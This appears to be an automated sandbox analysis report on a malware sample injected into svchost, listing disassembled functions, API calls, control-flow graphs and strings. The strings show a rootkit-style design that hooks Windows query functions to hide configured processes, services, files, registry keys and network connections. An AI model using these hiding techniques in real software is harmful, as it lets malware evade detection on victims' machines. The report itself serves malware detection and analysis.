                                                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction ID: 2dd3a0d31096118d6a60a2c658842b22b78508f034a802698af947492ced99fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction Fuzzy Hash: 47417D33615B86D6E7A0CF21E4447AE77E1F389BD9F048129DA8A07B58DF38C489CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction ID: 7be0d562e68d32c717df1b57b71a071eac9dee8509ff6e817a18bebfb5f68baa
                                                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction Fuzzy Hash: 03E06535E01A0686EB488F62D8083AA36E1FB89F86F0CC024C90907761DF7D8499CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction ID: 82cb52990f052ef71078733cde669ad4327fc990dc0a76f62db36cbba17f7ee9
                                                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction Fuzzy Hash: E6119270A16743B2FB609B21F8493FA22D4BB587CEF54F138E94681591EF78C0548F82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: GetProcessHeap.KERNEL32 ref: 000001F28A041633
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: HeapAlloc.KERNEL32 ref: 000001F28A041642
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A0416B2
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A0416DF
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A0416F9
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A041719
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A041734
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A041754
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A04176F
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A04178F
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A0417AA
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A0417CA
                                                                                                                                                                                            • Sleep.KERNEL32 ref: 000001F28A041AD7
                                                                                                                                                                                            • SleepEx.KERNEL32 ref: 000001F28A041ADD
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A0417E5
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A041805
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A041820
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A041840
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A04185B
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegOpenKeyExW.ADVAPI32 ref: 000001F28A04187B
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A041896
                                                                                                                                                                                              • Part of subcall function 000001F28A041628: RegCloseKey.ADVAPI32 ref: 000001F28A0418A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction ID: c3de326a91b217a7b476f4fc1949e6bad0b360758f1429933910719edb841b13
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3431CCB1612647A2FF509B26DA413F923E5BB88BDAF049431DF0D87696EF34C861CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A043844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 71 1f28a043844-1f28a04384f 72 1f28a043869-1f28a043870 71->72 73 1f28a043851-1f28a043864 StrCmpNIW 71->73 73->72 74 1f28a043866 73->74 74->72
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: dialer
                                                                                                                                                                                            • API String ID: 0-3528709123
                                                                                                                                                                                            • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                                                            • Instruction ID: 477e9178b75f975729dc5eee52024146b18d9399c23afee45759ff6514a1e5a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DD05E74712347A6FB54DFA688C57B06390EB04788F889034C90001150DF38898D9F10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A01273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction ID: e07d03626a97a33876f84814e53d2067df99581a70c6b9bc46dc4cea68522376
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: C461AD72B1169697DB548F299040BF9B3E2FB58BE4F588135DE5907788FE38D862CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 000001F28A042B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 373 1f28a042b2c-1f28a042ba5 call 1f28a062ce0 376 1f28a042ee0-1f28a042f03 373->376 377 1f28a042bab-1f28a042bb1 373->377 377->376 378 1f28a042bb7-1f28a042bba 377->378 378->376 379 1f28a042bc0-1f28a042bc3 378->379 379->376 380 1f28a042bc9-1f28a042bd9 GetModuleHandleA 379->380 381 1f28a042bdb-1f28a042beb call 1f28a056090 380->381 382 1f28a042bed 380->382 383 1f28a042bf0-1f28a042c0e 381->383 382->383 383->376 387 1f28a042c14-1f28a042c33 StrCmpNIW 383->387 387->376 388 1f28a042c39-1f28a042c3d 387->388 388->376 389 1f28a042c43-1f28a042c4d 388->389 389->376 390 1f28a042c53-1f28a042c5a 389->390 390->376 391 1f28a042c60-1f28a042c73 390->391 392 1f28a042c83 391->392 393 1f28a042c75-1f28a042c81 391->393 394 1f28a042c86-1f28a042c8a 392->394 393->394 395 1f28a042c9a 394->395 396 1f28a042c8c-1f28a042c98 394->396 397 1f28a042c9d-1f28a042ca7 395->397 396->397 398 1f28a042d9d-1f28a042da1 397->398 399 1f28a042cad-1f28a042cb0 397->399 402 1f28a042da7-1f28a042daa 398->402 403 1f28a042ed2-1f28a042eda 398->403 400 1f28a042cc2-1f28a042ccc 399->400 401 1f28a042cb2-1f28a042cbf call 1f28a04199c 399->401 405 1f28a042cce-1f28a042cdb 400->405 406 1f28a042d00-1f28a042d0a 400->406 401->400 407 1f28a042dbb-1f28a042dc5 402->407 408 1f28a042dac-1f28a042db8 call 1f28a04199c 402->408 403->376 403->391 405->406 412 1f28a042cdd-1f28a042cea 405->412 413 1f28a042d3a-1f28a042d3d 406->413 414 1f28a042d0c-1f28a042d19 406->414 409 1f28a042dc7-1f28a042dd4 407->409 410 1f28a042df5-1f28a042df8 407->410 408->407 409->410 416 1f28a042dd6-1f28a042de3 409->416 417 1f28a042e05-1f28a042e12 lstrlenW 410->417 418 1f28a042dfa-1f28a042e03 call 1f28a041bbc 410->418 419 1f28a042ced-1f28a042cf3 412->419 421 1f28a042d3f-1f28a042d49 call 1f28a041bbc 413->421 422 1f28a042d4b-1f28a042d58 lstrlenW 413->422 414->413 420 1f28a042d1b-1f28a042d28 414->420 424 1f28a042de6-1f28a042dec 416->424 430 1f28a042e14-1f28a042e1e 417->430 431 1f28a042e35-1f28a042e3f call 1f28a043844 417->431 418->417 436 1f28a042e4a-1f28a042e55 418->436 428 1f28a042cf9-1f28a042cfe 419->428 429 1f28a042d93-1f28a042d98 419->429 432 1f28a042d2b-1f28a042d31 420->432 421->422 421->429 425 1f28a042d5a-1f28a042d64 422->425 426 1f28a042d7b-1f28a042d8d call 1f28a043844 422->426 435 1f28a042dee-1f28a042df3 424->435 424->436 425->426 437 1f28a042d66-1f28a042d79 call 1f28a04152c 425->437 426->429 440 1f28a042e42-1f28a042e44 426->440 428->406 428->419 429->440 430->431 441 1f28a042e20-1f28a042e33 call 1f28a04152c 430->441 431->440 432->429 442 1f28a042d33-1f28a042d38 432->442 435->410 435->424 444 1f28a042e57-1f28a042e5b 436->444 445 1f28a042ecc-1f28a042ed0 436->445 437->426 437->429 440->403 440->436 441->431 441->436 442->413 442->432 450 1f28a042e63-1f28a042e7d call 1f28a0485c0 444->450 451 1f28a042e5d-1f28a042e61 444->451 445->403 454 1f28a042e80-1f28a042e83 450->454 451->450 451->454 457 1f28a042ea6-1f28a042ea9 454->457 458 1f28a042e85-1f28a042ea3 call 1f28a0485c0 454->458 457->445 460 1f28a042eab-1f28a042ec9 call 1f28a0485c0 457->460 458->457 460->445
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction ID: 3fed8c47ff0a8824a0b8e8f737e6590efe6929acdd19b9b7a2954c68f0dd4513
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                            • Instruction Fuzzy Hash: 57B15A72312A93A6EB659F26D4507F963E9FB48BD8F449026EE0953B95DF34C880CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A047D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction ID: 3212edddfdb3388e7da5e2cdef587f95c24044469fa36c6fd924548fb6c843fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction Fuzzy Hash: 38317072205B829AEB609F60E8503ED73B0F784788F44443ADB4D57B95EF38C548CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction ID: 91b18deced53cd844252dfd51144bcc9e3383d265835ba7f8bf8cab19f15f1d4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B316B32215F82A6EB60DF25E8403EE73A0F789798F544126EA9D53B99EF38C545CF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction ID: 303f05e426b5c844122d74163ff3722d308cdadba3e5abc8992663a8961ab7cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: EB712A36711A13A6EB109F65E8947EA23E4FB88BDDF446122DE4E57B68EF34C444CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A0412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction ID: ce4b275a3e519368670eb641beea245da05b03ef63800e1e1c2cb1f8a40ca1b5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction Fuzzy Hash: 29513B36A05B8696EB54CF62E5483AA77E1F789FD9F488134DA4A17B58DF3CC049CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A041D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612345216.000001F28A040000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F28A040000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a040000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction ID: 56e518d104b6fc4840e539ab14bcf5a4c4b94ad7003f197bd7af8e71a07a4864
                                                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A318174602A4BB1FB04EF69E8517F423A1BB083D9F809033D84A12566AE38869ACF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A016910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 215 1f28a016910-1f28a016916 216 1f28a016918-1f28a01691b 215->216 217 1f28a016951-1f28a01695b 215->217 218 1f28a016945-1f28a016984 call 1f28a016fc0 216->218 219 1f28a01691d-1f28a016920 216->219 220 1f28a016a78-1f28a016a8d 217->220 238 1f28a016a52 218->238 239 1f28a01698a-1f28a01699f call 1f28a016e54 218->239 221 1f28a016922-1f28a016925 219->221 222 1f28a016938 __scrt_dllmain_crt_thread_attach 219->222 223 1f28a016a9c-1f28a016ab6 call 1f28a016e54 220->223 224 1f28a016a8f 220->224 226 1f28a016927-1f28a016930 221->226 227 1f28a016931-1f28a016936 call 1f28a016f04 221->227 230 1f28a01693d-1f28a016944 222->230 236 1f28a016ab8-1f28a016aed call 1f28a016f7c call 1f28a016e1c call 1f28a017318 call 1f28a017130 call 1f28a017154 call 1f28a016fac 223->236 237 1f28a016aef-1f28a016b20 call 1f28a017190 223->237 228 1f28a016a91-1f28a016a9b 224->228 227->230 236->228 249 1f28a016b22-1f28a016b28 237->249 250 1f28a016b31-1f28a016b37 237->250 242 1f28a016a54-1f28a016a69 238->242 247 1f28a0169a5-1f28a0169b6 call 1f28a016ec4 239->247 248 1f28a016a6a-1f28a016a77 call 1f28a017190 239->248 265 1f28a016a07-1f28a016a11 call 1f28a017130 247->265 266 1f28a0169b8-1f28a0169dc call 1f28a0172dc call 1f28a016e0c call 1f28a016e38 call 1f28a01ac0c 247->266 248->220 249->250 254 1f28a016b2a-1f28a016b2c 249->254 255 1f28a016b39-1f28a016b43 250->255 256 1f28a016b7e-1f28a016b94 call 1f28a01268c 250->256 261 1f28a016c1f-1f28a016c2c 254->261 262 1f28a016b45-1f28a016b4d 255->262 263 1f28a016b4f-1f28a016b5d call 1f28a025780 255->263 274 1f28a016b96-1f28a016b98 256->274 275 1f28a016bcc-1f28a016bce 256->275 268 1f28a016b63-1f28a016b78 call 1f28a016910 262->268 263->268 278 1f28a016c15-1f28a016c1d 263->278 265->238 288 1f28a016a13-1f28a016a1f call 1f28a017180 265->288 266->265 318 1f28a0169de-1f28a0169e5 __scrt_dllmain_after_initialize_c 266->318 268->256 268->278 274->275 283 1f28a016b9a-1f28a016bbc call 1f28a01268c call 1f28a016a78 274->283 284 1f28a016bd5-1f28a016bea call 1f28a016910 275->284 285 1f28a016bd0-1f28a016bd3 275->285 278->261 283->275 312 1f28a016bbe-1f28a016bc6 call 1f28a025780 283->312 284->278 298 1f28a016bec-1f28a016bf6 284->298 285->278 285->284 305 1f28a016a45-1f28a016a50 288->305 306 1f28a016a21-1f28a016a2b call 1f28a017098 288->306 303 1f28a016bf8-1f28a016bff 298->303 304 1f28a016c01-1f28a016c11 call 1f28a025780 298->304 303->278 304->278 305->242 306->305 317 1f28a016a2d-1f28a016a3b 306->317 312->275 317->305 318->265 319 1f28a0169e7-1f28a016a04 call 1f28a01abc8 318->319 319->265
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000004.00000002.3612269784.000001F28A010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F28A010000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1f28a010000_svchost.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 8cb9a352f31c87c115c6a08f6d2fc983d3737e3106bed0b0cab5f75d8e8cd039
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A81D131B05343AAFB52AB65AC913F922E0EB857C0F588535EA4947797EF3CC8468F00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000001F28A04CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
